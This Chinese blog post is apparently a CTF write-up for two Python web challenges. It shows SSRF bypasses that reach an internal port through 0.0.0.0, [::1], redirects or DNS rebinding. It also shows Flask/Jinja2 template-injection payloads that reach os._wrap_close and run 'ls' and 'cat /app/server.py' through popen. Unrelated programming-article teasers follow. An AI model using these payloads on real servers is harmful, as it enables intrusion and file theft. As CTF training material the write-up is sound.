当前位置：首页 > news >正文

CTFer成长之路之Python中的安全问题

news 2025/9/15 2:57:13

Python中的安全问题CTF

1.Python里的SSRF

题目提示

尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag

访问url：

http://f5704bb3-5869-4ecb-9bdc-58b022589224.node3.buuoj.cn/

回显如下：

在这里插入图片描述

通过提示构造payload：

?url=http://127.0.0.1:8000/api/internal/secret

进行访问

在这里插入图片描述

回显提示127.0.0.1是禁止的因为127.0.0.1是本地的地址，提示是说访问容器内部的地址

所以我们可以用0.0.0.0代替127.0.0.1

重新构造payload：

?url=http://0.0.0.0:8000/api/internal/secret

成功得到flag

在这里插入图片描述

其他不同的方式，得多尝试一下，

官方wp

本题有多重解法

- `0.0.0.0:8000` 绕过
- `[::1]:8000` 绕过（需要支持 ipv6)
- 重定向跳转到 `127.0.0.1:8000`
- dns rebinding 输入一个域名，第一次解析到非 `127.0.0.1` 地址上，第二个解析到 `127.0.0.1` 上。

2.python模板注入(SSTI)

访问url，页面回显 password is wrong，但是没有输入密码的地方

在这里插入图片描述

所以从 url 提交

?password={{3*3}}

发现可以识别并且正确回显

在这里插入图片描述

据回显的结果可以判断这是一个flask模板注入

参考

flask之ssti模版注入从零到入门

通过以下语句

/?password={{"".__class__.__bases__[0].__subclasses__()}}

拿到可用的类的列表

在这里插入图片描述

我们需要的是os命令执行类<class ‘os._wrap_close’>

在这里插入图片描述

我们要判断他所属的位置，这样才能进行索引,将全部类复制放到pycharm(与他有同样功能的工具也行),我们索引逗号的位置，我们索引到我们需要类的位置,再在索引他前面逗号的位置，我这里索引的结果是127,如果不对上下浮动几位看一下，大概就这个位置，我这127是正确的，

在这里插入图片描述

我们可以先看一下我们索引的是否正确,输入url

/?password={{"".__class__.__bases__[0].__subclasses__()[127]}}

我这里索引的结果是127,如果不对上下浮动几位看一下，大概就这个位置，我这127是正确的,所以索引结果就是<class ‘os._wrap_close’>

在这里插入图片描述

构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令)

/?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}

文件夹如下

在这里插入图片描述

最引起我们注意的就是app这个文件夹

经过一些尝试(目录遍历什么的)，我们得知flag就在/app/server.py中,我们直接用cat查看文件内容就行

/?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat /app/server.py').read()}}

成功获取flag

在这里插入图片描述

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

博客:
https://rdyx0.github.io/先知社区：
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公众号：
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirectFreeBuf：
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

CTFer成长之路之Python中的安全问题

Python中的安全问题CTF 1.Python里的SSRF 题目提示尝试访问到容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag 访问url： http://f5704bb3-5869-4ecb-9bdc-58b022589224.node3.buuoj.cn/ 回显如下： 通过提示构造payload&…...

编程日记 2023/2/27 4:54:50

SpringBoot知识快速复习

Spring知识快速复习启动器自动装配ConfigurationImport导入组件Conditional条件装配ImportResource导入Spring配置文件ConfigurationProperties配置绑定Lombok简化开发dev-toolsyaml请求和响应处理静态资源规则与定制化请求处理-Rest映射请求处理-常用参数注解使用请求处理-Ser…...

编程日记 2023/2/27 4:53:40

SpringBoot+React博客论坛系统附带详细运行指导视频

文章目录一、项目演示二、项目介绍三、项目运行截图四、主要代码一、项目演示项目演示地址： 视频地址二、项目介绍项目描述：这是一个基于SpringBootReact框架开发的博客论坛系统。首先，这是一个前后端分离的项目，文章编辑器…...

编程日记 2023/2/27 4:52:34

C++ primer 之 extern

C primer 之 extern什么是声明什么是定义两者有什么区别ertern的作用什么是声明就是使得名字为程序所知，一个文件如果想使用别处定义的名字就必须包含对那个名字的声明。什么是定义负责创建与名字关联的实体。两者有什么区别变量声明和声明都规定了变量的…...

编程日记 2023/2/27 4:51:27

Linux 练习二（VIM编辑器 + GCC编译器 + GDB调试）

文章目录VIM命令思维导图GCC编译器1、GCC编译文件练习2、静态库动态库制作练习将此函数编译成动态库将此函数编译成静态库GCC优化选项 -OnGDB调试命令练习练习一：编写一个程序，通过gdb调试，使用到gdb的b，n，s&#xff0…...

编程日记 2023/2/27 4:50:15

python3PyMysql PyMySQL 是在 Python3.x 版本中用于连接 MySQL 服务器的一个库 ， 遵循 Python 数据库 API v2.0 规范。 PyMySQL 安装 pip install PyMySQLPyMySQL 连接数据库 import pymysql pymysql.Connect(hostlocalhost,port 3306,user root,password **…...

编程日记 2023/2/27 4:49:09

昇腾AI新技能，还能预防猪生病？

国药集团动物保健股份有限公司（简称“国药动保”）是专业从事动物保健产品研发、生产和销售的国家高新技术企业，是国内少数几家具备新产品原创能力的动物保健企业。其中，猪圆环病毒灭活疫苗等市场份额位居行业前列。 “猪圆环病毒…...

编程日记 2023/2/27 4:48:00

模板方法模式（Template Method）

模式结构图说明基本方法是模板方法的组成部分。基本方法分为一下三种： 抽象方法由抽象类声明，由其具体子类实现。C中就是纯虚函数。具体方法由抽象类或具体类声明并实现，子类可以进行覆盖也可以继承。C中是虚函数。钩子方法由抽象类…...

编程日记 2023/2/27 4:46:50

C C++ typedef的使用

一、为基本数据类型起别名 typedef int myint; myint x 5; "myint"是"int"的别名，可以使用"myint"来代替"int"声明变量，这个很好理解，但是也很少有人这么用吧。二、为结构体起别名 …...

编程日记 2023/2/27 4:45:43

Laravel框架03：DB类操作数据库

Laravel框架03：DB类操作数据库一、概述二、数据表的创建与配置三、增删改操作1. 增加信息2. 修改数据3. 删除数据四、查询操作1. 取出基本数据2. 取出单行数据3. 获取一个字段的值4. 获取多个字段的值5. 排序6. 分页五、执行任意的SQL语句一、概述按照MVC的架构&a…...

编程日记 2023/2/27 4:44:34

数据结构期末复习总结（前章）

作者的话作为一名计算机类的学生，我深知数据结构的重要性。在期末复习前，我希望通过这篇博客给大家一些复习建议。希望能帮助大家夯实数据结构的基础知识，并能够更好地掌握数据结构和算法的应用。一、绪论数据：信息的载体&am…...

编程日记 2023/2/27 4:43:27

设计环形队列

文章目录1.思路分析1.1队列空满分析1.2出队分析2.循环队列设计1.思路分析 1.1队列空满分析首先我们假设一个长度为4的环形队列队头front 队尾rear 当队列为空时 frontrear 当队列满时 frontrear 所以我们无法判断队列是满的或者空的因此我们多加入一个空间使队列长度为5&am…...

编程日记 2023/2/27 4:42:19

面向对象之-接口鉴权

1 需求 1.1 需求背景为了保证接口调用的安全性，我们希望设计实现一个接口调用鉴权功能，只有经过认证之后的系统才能调用我们的接口，没有认证过的系统调用我们的接口会被拒绝。 2 需求分析 2.1 基础分析对于如何做鉴权这样一个问题&…...

编程日记 2023/2/27 4:41:11

Python 多进程多线程线程池进程池协程

目录一、线程与进程很简单的介绍 1.1 线程与进程的区别二、多进程Process 2.1 多进程与多线程的区别 2.2 多进程为啥要使用队列 2.3 控制进程运行顺序 2.3.1 join ， 2.3.1 daemon 守护进程 2.4 进程id 2.5 进程存活状态is_alive() 2.5 实现自定义多…...

编程日记 2023/2/27 4:40:01

【自然语言处理】基于句子嵌入的文本摘要算法实现

基于句子嵌入的文本摘要算法实现人们在理解了文本的含义后，很容易用自己的话对文本进行总结。但在数据过多、缺乏人力和时间的情况下，自动文本摘要则显得至关重要。一般使用自动文本摘要的原因包括： 减少阅读时间根据摘要，选择自…...

编程日记 2023/2/27 4:38:56

fiddler抓包

一、工具介绍Fiddler是一个通过代理的方式来进行抓包工具，运行时会在本地建立一个代理服务，默认地址：127.0.0.1:8888。Fiddler开启之后，配置本机代理，再打开IE浏览器，IE的PROXY会自动变成127.0.0.1:8888&am…...

编程日记 2023/2/27 4:37:45

【Linux】网络套接字编程

前言在掌握一定的网络基础，我们便可以先从代码入手，利用UDP协议/TCP协议进行编写套接字程序，明白网络中服务器端与客户端之间如何进行连接并且通信的。目录一、了解源目的IP、端口、网络字节序、套接字端口号： 套接字&…...

编程日记 2023/2/27 4:36:34

break与continue关键字

1.概述不知道大家有没有这样一种感受哈，有的时候容易混淆break语句和continue语句的用法，总是模棱两可，不敢确定自己是否使用正确了。正好，我们本篇的重点就是break和continue关键字的用法。 2.使用场景 Java中为啥会诞生break…...

编程日记 2023/2/27 4:34:19

kafka使用入门案例与踩坑记录

每次用到kafka时都会出现各种奇怪的问题，综合实践，下面汇总下主要操作步骤： Docker镜像形式启动 zookeeper启动 docker run -d --name zookeeper -p 2181:2181 -t wurstmeister/zookeeperkafka启动 docker run --name kafka01 -p 9092:909…...

编程日记 2023/2/27 4:33:10